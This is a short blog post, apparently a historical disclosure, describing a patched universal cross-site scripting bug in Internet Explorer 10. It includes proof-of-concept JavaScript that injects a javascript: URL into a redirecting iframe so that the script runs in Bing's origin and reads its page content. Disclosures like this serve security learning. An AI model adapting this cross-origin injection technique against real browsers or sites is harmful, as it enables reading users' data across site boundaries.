UXSS via iFrame Redirect and location javascript Protocol

A simple UXSS using an iFrame that redirects to another domain: before the redirect completes, the parent injects an execScript into the iFrame that sets the iFrame’s own location to a javascript: URL. That URL executes in the context of the destination domain after the redirect finishes.

function main() {
    document.getElementById("myDiv").innerHTML = '<iframe src="redirect.aspx" width="600" height="200"></iframe>';
    window[0].execScript('w = parent;alert("Wait until Bing loads and click OK");w[0].location = \'javascript:alert(document.URL + document.body.innerText)\'');
}

The alert inside the injected execScript pauses the iFrame’s thread, giving Bing time to load in the background. When the user dismisses the alert, the location assignment fires and the javascript: URL runs in Bing’s context. Note that this did not reproduce on the IE11 20130227-2100 build at the time because document.all and instant execScript had other issues — but it worked reliably on IE10. Tested on Win8 IE10.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Address Bar Spoof via prompt and document.write] :: [Resident Script via createElement Object Self-Pointer] >